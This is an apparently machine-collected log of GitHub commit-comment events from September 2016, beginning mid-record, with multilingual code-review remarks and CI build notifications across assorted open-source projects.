border should be also 'curved' as the rest of boxes. :D\r\n\r\nMaybe it is because you asked for a table, not for a box.\r\n\r\nPLEASE ALL, if not much inconvenience, review the whole Figure and tell me all changes you want. There's no limit, of course, in the number of changes, but it is easier if I change more things at one time, than several times, one small change each."}},"created_at":"2016-09-07T09:01:11Z"}
{"id":"4526317538","type":"CommitCommentEvent","actor":{"login":"sggua"},"repo":{"name":"sggua/goit"},"payload":{"comment":{"id":18925115,"position":12,"line":13,"path":"JavaCoreGoIt/src/module04/task46/BankSystemImpl.java","commit_id":"52dd5f924760d8d7aabf52df6ac33c038786a2e4","created_at":"2016-09-07T09:01:11Z","updated_at":"2016-09-07T09:01:11Z","body":"100% вот это я прогнал :)"}},"created_at":"2016-09-07T09:01:11Z"}
{"id":"4526319164","type":"CommitCommentEvent","actor":{"login":"sggua"},"repo":{"name":"sggua/goit"},"payload":{"comment":{"id":18925120,"position":11,"line":12,"path":"JavaCoreGoIt/src/module04/task46/BankSystemImpl.java","commit_id":"52dd5f924760d8d7aabf52df6ac33c038786a2e4","created_at":"2016-09-07T09:01:30Z","updated_at":"2016-09-07T09:01:30Z","body":"резонно\r\nдобавлю"}},"created_at":"2016-09-07T09:01:30Z"}
{"id":"4526320150","type":"CommitCommentEvent","actor":{"login":"darkv"},"repo":{"name":"wocommunity/wonder"},"payload":{"comment":{"id":18925122,"position":null,"line":null,"path":null,"commit_id":"6b36e266c6dc47ccb2746a649f9ac13123673d09","created_at":"2016-09-07T09:01:42Z","updated_at":"2016-09-07T09:01:42Z","body":"What versions of WO and Wonder do you use? Seems that you are not using a recent version.\r\n\r\nAs you can see in the code above and in a current Wonder checkout as well *_colCount* is not package scoped but *protected*. In current Wonder 7 the WOTable component has been removed from ERExtensions but there is still the one in JavaWOExtensions which is used as base class for ERXTable.\r\n\r\nIn Wonder 6 that former copy of WOTable is still there but marked as deprecated."}},"created_at":"2016-09-07T09:01:42Z"}
{"id":"4526320197","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18925123,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-07T09:01:42Z","updated_at":"2016-09-07T09:01:42Z","body":"@ajithcj This cannot be committed as is for obvious reasons (well described in the link provided by @Rocky640 https://github.com/glinscott/fishtest/wiki/Fishtest-faq#what-is-an-union-patch).\r\n\r\nIn particular, Position::gives_threat(), that failed its own test, will **NOT** be sneaked in with this one.\r\n\r\nSo please don't open a PR and also in the future avoid abusing combo patches.\r\n\r\n\r\n"}},"created_at":"2016-09-07T09:01:42Z"}
{"id":"4526323829","type":"CommitCommentEvent","actor":{"login":"tilsammans"},"repo":{"name":"codevise/pageflow"},"payload":{"comment":{"id":18925131,"position":null,"line":null,"path":null,"commit_id":"206322424d1276d20cbebecce78529d59aedb45c","created_at":"2016-09-07T09:02:24Z","updated_at":"2016-09-07T09:02:24Z","body":"I sense a new release is coming... 😄 "}},"created_at":"2016-09-07T09:02:24Z"}
{"id":"4526327032","type":"CommitCommentEvent","actor":{"login":"dguy"},"repo":{"name":"norwood/kafka"},"payload":{"comment":{"id":18925138,"position":26,"line":139,"path":"streams/src/main/java/org/apache/kafka/streams/processor/internals/ProcessorStateManager.java","commit_id":"643a4a59826a6383fd5c1408f21eefe6cf994752","created_at":"2016-09-07T09:03:01Z","updated_at":"2016-09-07T09:03:01Z","body":"Could we do:\r\n```\r\nif (topic == null) {\r\n  this.stores.put(storeName, store);\r\n  return;\r\n}\r\n```\r\n\r\ni.e, bail out early as it not normal case and keep the normal case outside of an `if`\r\nAlso means we no longer check `if (topic != null)` further down. Would be cleaner IMO"}},"created_at":"2016-09-07T09:03:01Z"}
{"id":"4526329513","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925146,"position":null,"line":null,"path":null,"commit_id":"79afbac2979b8be04b6c5c574d147c83cfec4cbf","created_at":"2016-09-07T09:03:30Z","updated_at":"2016-09-07T09:03:30Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 942](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12808&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T09:03:30Z"}
{"id":"4526331642","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925152,"position":null,"line":null,"path":null,"commit_id":"8ba4e1a2bd8a18e703f0e7a726dc12201d887dc2","created_at":"2016-09-07T09:03:56Z","updated_at":"2016-09-07T09:03:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 941](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12802&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:08"}},"created_at":"2016-09-07T09:03:56Z"}
{"id":"4526332296","type":"CommitCommentEvent","actor":{"login":"noonnightcoder"},"repo":{"name":"noonnightcoder/bakou-pos-plus"},"payload":{"comment":{"id":18925154,"position":null,"line":null,"path":null,"commit_id":"f7ecc7373c826dbc86eb8ade00a97f361e0cb70f","created_at":"2016-09-07T09:04:05Z","updated_at":"2016-09-07T09:04:05Z","body":"to delete from push"}},"created_at":"2016-09-07T09:04:05Z"}
{"id":"4526332340","type":"CommitCommentEvent","actor":{"login":"hemokosa"},"repo":{"name":"Beyond2020/AlgorithmicLogotype"},"payload":{"comment":{"id":18925155,"position":null,"line":null,"path":null,"commit_id":"8f857ae5d42a70b6ff7b91b70c52d85497722cfc","created_at":"2016-09-07T09:04:06Z","updated_at":"2016-09-07T09:04:06Z","body":"佐藤さん、最終案どうもありがとう。いい感じなのが色が地味なので、リングの立体感が際立つように、カラフルな色をつけることは可能ですか？未来を感じさせる明るい感を醸しだす感じで:-) あと、2020のフォントもこのリングに連動していると思うので、同じ色をつけるといいかもしれません。"}},"created_at":"2016-09-07T09:04:06Z"}
{"id":"4526332628","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925157,"position":4,"line":3,"path":"riot/tags/demo_app.tag","commit_id":"a49184388cdaa89c0d54aa6c396de89b1c970a80","created_at":"2016-09-07T09:04:10Z","updated_at":"2016-09-07T09:04:10Z","body":"พวก DOM ถ้าไม่มี children DOM เอาไว้บรรทัดเดียวกันดีกว่าครับ"}},"created_at":"2016-09-07T09:04:10Z"}
{"id":"4526333775","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18925159,"position":28,"line":389,"path":"application/controllers/survey/index.php","commit_id":"f5606a3ac2a0f72dd0f0470ad14ddf1031d76b51","created_at":"2016-09-07T09:04:24Z","updated_at":"2016-09-07T09:04:24Z","body":"@lacrioque If you comment out code, please also write why. Alternatively, remove the code in one specific commit and describe why in the commit message."}},"created_at":"2016-09-07T09:04:24Z"}
{"id":"4526336477","type":"CommitCommentEvent","actor":{"login":"larslindq"},"repo":{"name":"uppsala-university/ladok"},"payload":{"comment":{"id":18925167,"position":null,"line":null,"path":null,"commit_id":"9b4e7cfbeee2fd5ba9b36cc453464df28d4ab933","created_at":"2016-09-07T09:04:57Z","updated_at":"2016-09-07T09:04:57Z","body":"OK. Vad ersätts den av (om något)? Modul/Utbildningsinstans?"}},"created_at":"2016-09-07T09:04:57Z"}
{"id":"4526337020","type":"CommitCommentEvent","actor":{"login":"moderncheng"},"repo":{"name":"moderncheng/springTransaction"},"payload":{"comment":{"id":18925170,"position":null,"line":null,"path":null,"commit_id":"7777c57dc83cef9ca04190e956f35e86a984094b","created_at":"2016-09-07T09:05:04Z","updated_at":"2016-09-07T09:05:04Z","body":"上传"}},"created_at":"2016-09-07T09:05:04Z"}
{"id":"4526339557","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18925175,"position":null,"line":null,"path":null,"commit_id":"2d65afb60d43a71475d598a2ac5cbc3bf205dc90","created_at":"2016-09-07T09:05:34Z","updated_at":"2016-09-07T09:05:34Z","body":"tip: when changing margin and padding, always remember to also test on small screens for arrays question types (for \"no more table mode\"). "}},"created_at":"2016-09-07T09:05:34Z"}
{"id":"4526341109","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925178,"position":5,"line":14,"path":"mithril/mithril_include.js","commit_id":"a49184388cdaa89c0d54aa6c396de89b1c970a80","created_at":"2016-09-07T09:05:53Z","updated_at":"2016-09-07T09:05:53Z","body":"เอ mithril ไม่มี utility สำหรับสร้าง DOM สั้นๆหรอครับ? เช่น\r\n```js\r\ndiv(null,\r\n br(),\r\n ServerTable(),\r\n hr(),\r\n  AddPanel())\r\n```\r\nแต่อันนี้ก็ดูไม่ได้น่าเกลียดอะไร"}},"created_at":"2016-09-07T09:05:53Z"}
{"id":"4526341440","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925179,"position":null,"line":null,"path":null,"commit_id":"e468813fc032c5558eb3f384b2d886e919d7515b","created_at":"2016-09-07T09:05:56Z","updated_at":"2016-09-07T09:05:56Z","body":"Is there a reason we _need_ to set the project name in these guide repositories?\r\n\r\nBy \"overhead\", I mean that `settings.gradle` is just one more artifact to deal with when trying to understand what's here. It's bad enough that we have a `gradle` directory and two `gradlew*` shell scripts. Yet another gradle file, if it's not actually useful, is (a) just one more thing to potentially distract or turn off the uninitiated, and (b) just one more thing for us to maintain, because we have to keep it in sync with the name of the repository.\r\n\r\nNote that as a rule, the Spring guides do not use `settings.gradle` either, and there's no downside there as far as I can recall."}},"created_at":"2016-09-07T09:05:56Z"}
{"id":"4526344721","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925181,"position":2,"line":12,"path":"mithril/mithril_include.js","commit_id":"a49184388cdaa89c0d54aa6c396de89b1c970a80","created_at":"2016-09-07T09:06:34Z","updated_at":"2016-09-07T09:06:34Z","body":"ถ้าเป็น es6 สามารถ ย่อเหลือ\r\n```js\r\nlet DemoServerApp = {\r\n  view(ctrl, args) {\r\n    return div();\r\n  }\r\n}\r\n```\r\nได้นะครับ"}},"created_at":"2016-09-07T09:06:34Z"}
{"id":"4526347776","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925187,"position":1,"line":58,"path":"react/main.css","commit_id":"a49184388cdaa89c0d54aa6c396de89b1c970a80","created_at":"2016-09-07T09:07:10Z","updated_at":"2016-09-07T09:07:10Z","body":"ไม่จำเป็นต้องใส่ `table` ด้านหน้าก็ได้ครับ ระบุไปเลยว่า class dataTable ใช้ style นี้"}},"created_at":"2016-09-07T09:07:10Z"}
{"id":"4526348850","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925192,"position":null,"line":null,"path":null,"commit_id":"f272736f86e31b41a458ee05844c123ddd3b67ef","created_at":"2016-09-07T09:07:22Z","updated_at":"2016-09-07T09:07:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 943](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12811&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T09:07:22Z"}
{"id":"4526349917","type":"CommitCommentEvent","actor":{"login":"artpol84"},"repo":{"name":"karasevb/master"},"payload":{"comment":{"id":18925196,"position":296,"line":344,"path":"src/dstore/pmix_esh.c","commit_id":"8687b51770d483d6d22231c16aad0c551fb7f343","created_at":"2016-09-07T09:07:35Z","updated_at":"2016-09-07T09:07:35Z","body":"```C\r\n_jobuild = getuid();\r\n_sejobuid = 0;\r\n```"}},"created_at":"2016-09-07T09:07:35Z"}
{"id":"4526352471","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925202,"position":1,"line":58,"path":"riot/main.css","commit_id":"a49184388cdaa89c0d54aa6c396de89b1c970a80","created_at":"2016-09-07T09:08:06Z","updated_at":"2016-09-07T09:08:06Z","body":"เอ อันนี้ซ้ำกับ class ด้านบน ใช้ไฟล์เดียวดีกว่า"}},"created_at":"2016-09-07T09:08:06Z"}
{"id":"4526352904","type":"CommitCommentEvent","actor":{"login":"chrisprice"},"repo":{"name":"ColinEberhardt/d3fc-annotation"},"payload":{"comment":{"id":18925206,"position":26,"line":21,"path":"src/band.js","commit_id":"b9b74e26ce9da35934111c281e6316aa35709b0f","created_at":"2016-09-07T09:08:11Z","updated_at":"2016-09-07T09:08:11Z","body":"Fair point, it isn't 👍 "}},"created_at":"2016-09-07T09:08:11Z"}
{"id":"4526355164","type":"CommitCommentEvent","actor":{"login":"sztosz"},"repo":{"name":"piokaczm/ElixirBot"},"payload":{"comment":{"id":18925208,"position":13,"line":28,"path":"lib/elixir_bot.ex","commit_id":"10d202ef705bc842728ad9d1ce37b63cc44ab127","created_at":"2016-09-07T09:08:36Z","updated_at":"2016-09-07T09:08:36Z","body":"You can use `show` function directly in ShoppingList.list_msg, then there would not be need to pass content explictly."}},"created_at":"2016-09-07T09:08:36Z"}
{"id":"4526355311","type":"CommitCommentEvent","actor":{"login":"itaymesh"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":18925209,"position":null,"line":null,"path":null,"commit_id":"54df23a2cddd92d6961dfda3b80e480c6d7c822e","created_at":"2016-09-07T09:08:38Z","updated_at":"2016-09-07T09:08:38Z","body":"I also tested this commit and it works.\r\nBut the active code is located on the min files\r\nvendor/magento/magento2-base/lib/web/legacy-build.min.js \r\nlib/web/legacy-build.min.js\r\n\r\nPlease apply the fixes and make it available on the next release. \r\nThanks"}},"created_at":"2016-09-07T09:08:38Z"}
{"id":"4526358648","type":"CommitCommentEvent","actor":{"login":"artpol84"},"repo":{"name":"karasevb/master"},"payload":{"comment":{"id":18925214,"position":303,"line":351,"path":"src/dstore/pmix_esh.c","commit_id":"8687b51770d483d6d22231c16aad0c551fb7f343","created_at":"2016-09-07T09:09:19Z","updated_at":"2016-09-07T09:09:19Z","body":"```C\r\nrc = _esh_nspace_tbl_init();\r\nreturn rc;\r\n```\r\n\r\n\r\n"}},"created_at":"2016-09-07T09:09:19Z"}
{"id":"4526359447","type":"CommitCommentEvent","actor":{"login":"CHENDATOU"},"repo":{"name":"CHENDATOU/-"},"payload":{"comment":{"id":18925216,"position":null,"line":null,"path":null,"commit_id":"01b2aa6cf999efe75919614e653dacc3e715fe6a","created_at":"2016-09-07T09:09:28Z","updated_at":"2016-09-07T09:09:28Z","body":"恢复"}},"created_at":"2016-09-07T09:09:28Z"}
{"id":"4526361755","type":"CommitCommentEvent","actor":{"login":"sztosz"},"repo":{"name":"piokaczm/ElixirBot"},"payload":{"comment":{"id":18925226,"position":23,"line":38,"path":"lib/elixir_bot.ex","commit_id":"10d202ef705bc842728ad9d1ce37b63cc44ab127","created_at":"2016-09-07T09:09:56Z","updated_at":"2016-09-07T09:09:56Z","body":"As in above, you can use `show` inside of `ready_msg`."}},"created_at":"2016-09-07T09:09:56Z"}
{"id":"4526364474","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"mantesat/geotools"},"payload":{"comment":{"id":18925238,"position":7,"line":5,"path":"modules/library/render/src/main/java/org/geotools/renderer/lite/gridcoverage2d/GridCoverageRenderer.java","commit_id":"a35bf256a322f460362ce1caa3dee3daf82c4a90","created_at":"2016-09-07T09:10:30Z","updated_at":"2016-09-07T09:10:30Z","body":"Rules have changed, no need to update the copyright year anymore. But no need to revert it to its previous state either, we just don't care anymore after a legal consultation with OSGeo. So, for the future, you just need to add the copyright header with the current year if the header is missing, otherwise no change needed."}},"created_at":"2016-09-07T09:10:30Z"}
{"id":"4526365739","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/schedulerCS356"},"payload":{"comment":{"id":18925246,"position":null,"line":null,"path":null,"commit_id":"871154aa38f4c4f10074f3298c34017dfc9bbc57","created_at":"2016-09-07T09:10:44Z","updated_at":"2016-09-07T09:10:44Z","body":"@MichaelWallace30 \r\nMay she rest in peace ;=;"}},"created_at":"2016-09-07T09:10:44Z"}
{"id":"4526370992","type":"CommitCommentEvent","actor":{"login":"tkisme"},"repo":{"name":"vokins/yhosts"},"payload":{"comment":{"id":18925264,"position":null,"line":null,"path":null,"commit_id":"7445e35d4ebaaf12562e862bf1907432074a2990","created_at":"2016-09-07T09:11:47Z","updated_at":"2016-09-07T09:11:47Z","body":" www.yhd.com 屏蔽网站"}},"created_at":"2016-09-07T09:11:47Z"}
{"id":"4526373253","type":"CommitCommentEvent","actor":{"login":"AndriyGd"},"repo":{"name":"AndriyGd/NET"},"payload":{"comment":{"id":18925274,"position":15,"line":15,"path":"SimpleBookLibrary/SimpleBookLibrary/Book.cs","commit_id":"c5633ae6432c3ac620b52aeb6e6e426890939ad1","created_at":"2016-09-07T09:12:15Z","updated_at":"2016-09-07T09:12:15Z","body":"Add method ToString()"}},"created_at":"2016-09-07T09:12:15Z"}
{"id":"4526373731","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925275,"position":null,"line":null,"path":null,"commit_id":"79afbac2979b8be04b6c5c574d147c83cfec4cbf","created_at":"2016-09-07T09:12:20Z","updated_at":"2016-09-07T09:12:20Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 942](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12808&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:51"}},"created_at":"2016-09-07T09:12:20Z"}
{"id":"4526378255","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925286,"position":null,"line":null,"path":null,"commit_id":"8db3c0591ee2f8c81936b63c90e220463d56b9ff","created_at":"2016-09-07T09:13:15Z","updated_at":"2016-09-07T09:13:15Z","body":"I removed it because it just didn't feel like it was carrying it's own weight as-is. It should be obvious enough to anyone inclined to use their IDE that they can if they wish. Simply mentioning the same here doesn't actually add any value or help anyone, so far as I can tell.\r\n\r\nWhen we work on gradle/build-tool-web#90, that situation will change. We'll make it a point to create a first-class path for completing these guides in-IDE, and at that point we'll actually have value to add with such a callout.\r\n\r\nIn the meantime, I'd still say let's leave it out. Especially because if we leave it in here, we should have the same callout in place in _every_ guide, and I don't want to repeat that boilerplate everywhere when it's currently of such marginal utility.\r\n\r\nDoes that rationale work for you, @pledbrook? If there are other opinions here (@eriwen), please speak up."}},"created_at":"2016-09-07T09:13:15Z"}
{"id":"4526381923","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"mantesat/geotools"},"payload":{"comment":{"id":18925295,"position":62,"line":113,"path":"modules/library/render/src/main/java/org/geotools/renderer/lite/gridcoverage2d/GridCoverageRenderer.java","commit_id":"a35bf256a322f460362ce1caa3dee3daf82c4a90","created_at":"2016-09-07T09:13:57Z","updated_at":"2016-09-07T09:13:57Z","body":"Spurious changes removing trailing spaces. Please avoid them, diffs should only contain actual changes, this makes reviewing pull requests harder and also cherry-picks for backports harder."}},"created_at":"2016-09-07T09:13:57Z"}
{"id":"4526382101","type":"CommitCommentEvent","actor":{"login":"leeppeng"},"repo":{"name":"leeppeng/lppeng"},"payload":{"comment":{"id":18925296,"position":null,"line":null,"path":null,"commit_id":"eeadd9f968a831bb3bd25ecaed2c3609fc2cb0b6","created_at":"2016-09-07T09:13:58Z","updated_at":"2016-09-07T09:13:58Z","body":"666"}},"created_at":"2016-09-07T09:13:58Z"}
{"id":"4526387303","type":"CommitCommentEvent","actor":{"login":"ELynx"},"repo":{"name":"ELynx/pokemon-go-xposed-mitm"},"payload":{"comment":{"id":18925308,"position":null,"line":null,"path":null,"commit_id":"b05516a531a239b9e3f438fe24d430cdc3246d17","created_at":"2016-09-07T09:15:01Z","updated_at":"2016-09-07T09:15:01Z","body":"Oops as per #21 \r\nHappens"}},"created_at":"2016-09-07T09:15:01Z"}
{"id":"4526387814","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925314,"position":null,"line":null,"path":null,"commit_id":"f272736f86e31b41a458ee05844c123ddd3b67ef","created_at":"2016-09-07T09:15:08Z","updated_at":"2016-09-07T09:15:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 943](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12811&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 213, ignored: 3 Build time: 00:07:46\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.PUT request with same deviceName fails with conflict.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T09:15:08Z"}
{"id":"4526389791","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925322,"position":397,"line":397,"path":"react/react_include.js","commit_id":"03115adb40e2d1bf4286d01009804e4c31f0be76","created_at":"2016-09-07T09:15:31Z","updated_at":"2016-09-07T09:15:31Z","body":"main app ถ้ามีแค่ render สามารถย่อเหลือ\r\n```js\r\nApp = () => (\r\n  <Router history={hashHistory}>\r\n  </Router>\r\n)\r\n```\r\nได้นะครับ"}},"created_at":"2016-09-07T09:15:31Z"}
{"id":"4526391763","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"mantesat/geotools"},"payload":{"comment":{"id":18925329,"position":568,"line":1008,"path":"modules/library/render/src/main/java/org/geotools/renderer/lite/gridcoverage2d/GridCoverageRenderer.java","commit_id":"a35bf256a322f460362ce1caa3dee3daf82c4a90","created_at":"2016-09-07T09:15:53Z","updated_at":"2016-09-07T09:15:53Z","body":"Please have this one in its own class, reusable by GeoServer."}},"created_at":"2016-09-07T09:15:53Z"}
{"id":"4526393115","type":"CommitCommentEvent","actor":{"login":"vit9696"},"repo":{"name":"jrfonseca/drmingw"},"payload":{"comment":{"id":18925335,"position":null,"line":null,"path":null,"commit_id":"58320fa045070fd200856131d644f324057b5761","created_at":"2016-09-07T09:16:10Z","updated_at":"2016-09-07T09:16:10Z","body":"Thanks"}},"created_at":"2016-09-07T09:16:10Z"}
{"id":"4526393895","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925338,"position":400,"line":400,"path":"react/react_include.js","commit_id":"03115adb40e2d1bf4286d01009804e4c31f0be76","created_at":"2016-09-07T09:16:16Z","updated_at":"2016-09-07T09:16:16Z","body":"พยายามอย่าใช้ Parent.Router ดีกว่าฮะ ประกาศไปตรงๆ ง่ายกว่า"}},"created_at":"2016-09-07T09:16:16Z"}
{"id":"4526393923","type":"CommitCommentEvent","actor":{"login":"yusei1224"},"repo":{"name":"yusei1224/protospace"},"payload":{"comment":{"id":18925339,"position":null,"line":null,"path":null,"commit_id":"9973067a448d4f981951f1501153c8df033e0f9f","created_at":"2016-09-07T09:16:17Z","updated_at":"2016-09-07T09:16:17Z","body":"WHAT \r\nDBの設計\r\nWHY\r\n準備"}},"created_at":"2016-09-07T09:16:17Z"}
{"id":"4526394167","type":"CommitCommentEvent","actor":{"login":"sztosz"},"repo":{"name":"piokaczm/ElixirBot"},"payload":{"comment":{"id":18925340,"position":6,"line":22,"path":"lib/shopping_list.ex","commit_id":"10d202ef705bc842728ad9d1ce37b63cc44ab127","created_at":"2016-09-07T09:16:19Z","updated_at":"2016-09-07T09:16:19Z","body":"http://elixir-lang.org/docs/stable/elixir/String.html#length/1"}},"created_at":"2016-09-07T09:16:19Z"}
{"id":"4526395449","type":"CommitCommentEvent","actor":{"login":"Leapfrognz"},"repo":{"name":"dnadesign/silverstripe-elemental"},"payload":{"comment":{"id":18925345,"position":null,"line":null,"path":null,"commit_id":"61ccecd3bff2f9b9d8b14a6b5d7da626db9f3bf6","created_at":"2016-09-07T09:16:33Z","updated_at":"2016-09-07T09:16:33Z","body":"Yes still a work in progress, sorry shouldnt have pushed. Will delete tomorrow.\r\n"}},"created_at":"2016-09-07T09:16:33Z"}
{"id":"4526400727","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"cyberblast/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18925360,"position":null,"line":null,"path":null,"commit_id":"742ea55e3d3d7aaa664633c357c975c30ba27b37","created_at":"2016-09-07T09:17:35Z","updated_at":"2016-09-07T09:17:35Z","body":"Oh yes thanks :) "}},"created_at":"2016-09-07T09:17:35Z"}
{"id":"4526401991","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925365,"position":null,"line":null,"path":null,"commit_id":"f272736f86e31b41a458ee05844c123ddd3b67ef","created_at":"2016-09-07T09:17:49Z","updated_at":"2016-09-07T09:17:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 944](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12818&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T09:17:49Z"}
{"id":"4526403192","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925367,"position":375,"line":375,"path":"react/react_include.js","commit_id":"03115adb40e2d1bf4286d01009804e4c31f0be76","created_at":"2016-09-07T09:18:02Z","updated_at":"2016-09-07T09:18:02Z","body":"เอ block นี้ใช้ \r\n\r\n```js\r\nklass = `${klass} ${this.state.level}` ตรงๆ น่าจะได้ป่าวครับ?\r\n```"}},"created_at":"2016-09-07T09:18:02Z"}
{"id":"4526405938","type":"CommitCommentEvent","actor":{"login":"11mb"},"repo":{"name":"JacobDrummond/Magento2-Product-Downloads"},"payload":{"comment":{"id":18925372,"position":34,"line":34,"path":"Ui/DataProvider/Product/Form/Modifier/Downloads.php","commit_id":"93bf79267e7094b44002e042ec2fb372ea9fa822","created_at":"2016-09-07T09:18:31Z","updated_at":"2016-09-07T09:18:31Z","body":"Thx for your quick reply @JacobDrummond. Indeed the new way now is not only to add the fields in the eav table via an installer but also add the fields in the layout xml file which you are doing here in the modifier. However I find it strange that these fields don't get a name since you implemented it just like the example code in http://devdocs.magento.com/guides/v2.1/howdoi/customize_product.html. The generated html code looks goed.. my guess is that something is not good in the knockout javascript."}},"created_at":"2016-09-07T09:18:31Z"}
{"id":"4526407055","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925377,"position":345,"line":345,"path":"react/react_include.js","commit_id":"03115adb40e2d1bf4286d01009804e4c31f0be76","created_at":"2016-09-07T09:18:44Z","updated_at":"2016-09-07T09:18:44Z","body":"short form ย่อเหลือ \r\n```js\r\nthis.setState({ level, text }); ได้นะครับ\r\n```"}},"created_at":"2016-09-07T09:18:44Z"}
{"id":"4526410472","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925386,"position":34,"line":77,"path":"README.adoc","commit_id":"96ef2c8f4da5cb2d7cfe86debd8b71771f875a57","created_at":"2016-09-07T09:19:21Z","updated_at":"2016-09-07T09:19:21Z","body":"That's a good one for the [style guide](gradle/build-tool-web#92). As a rule of thumb, place admonitions between paragraphs / at the end of sections.\r\n\r\nIn this case, I think I'd still make an exception, since like you say the admonition would seem out of place otherwise."}},"created_at":"2016-09-07T09:19:21Z"}
{"id":"4526412766","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"mantesat/geotools"},"payload":{"comment":{"id":18925390,"position":718,"line":1259,"path":"modules/library/render/src/main/java/org/geotools/renderer/lite/gridcoverage2d/GridCoverageRenderer.java","commit_id":"a35bf256a322f460362ce1caa3dee3daf82c4a90","created_at":"2016-09-07T09:19:47Z","updated_at":"2016-09-07T09:19:47Z","body":"The code is not checking if the reader actually supports band selection. It should pick the reader, get its format, and see if the bands parameter is advertised as supported."}},"created_at":"2016-09-07T09:19:47Z"}
{"id":"4526416447","type":"CommitCommentEvent","actor":{"login":"Kyp2003"},"repo":{"name":"Kyp2003/StormEngine2"},"payload":{"comment":{"id":18925402,"position":null,"line":null,"path":null,"commit_id":"743a0f9581a10837a91cb296ff5a1114535e8d4e","created_at":"2016-09-07T09:20:29Z","updated_at":"2016-09-07T09:20:29Z","body":"ok"}},"created_at":"2016-09-07T09:20:29Z"}
{"id":"4526417650","type":"CommitCommentEvent","actor":{"login":"Venefic"},"repo":{"name":"Venefic/maps"},"payload":{"comment":{"id":18925403,"position":5,"line":9,"path":"package.json","commit_id":"bd0633a4ba1e07eefdd0d2295c1b28198ecbba8d","created_at":"2016-09-07T09:20:42Z","updated_at":"2016-09-07T09:20:42Z","body":"remove mongoose in future"}},"created_at":"2016-09-07T09:20:42Z"}
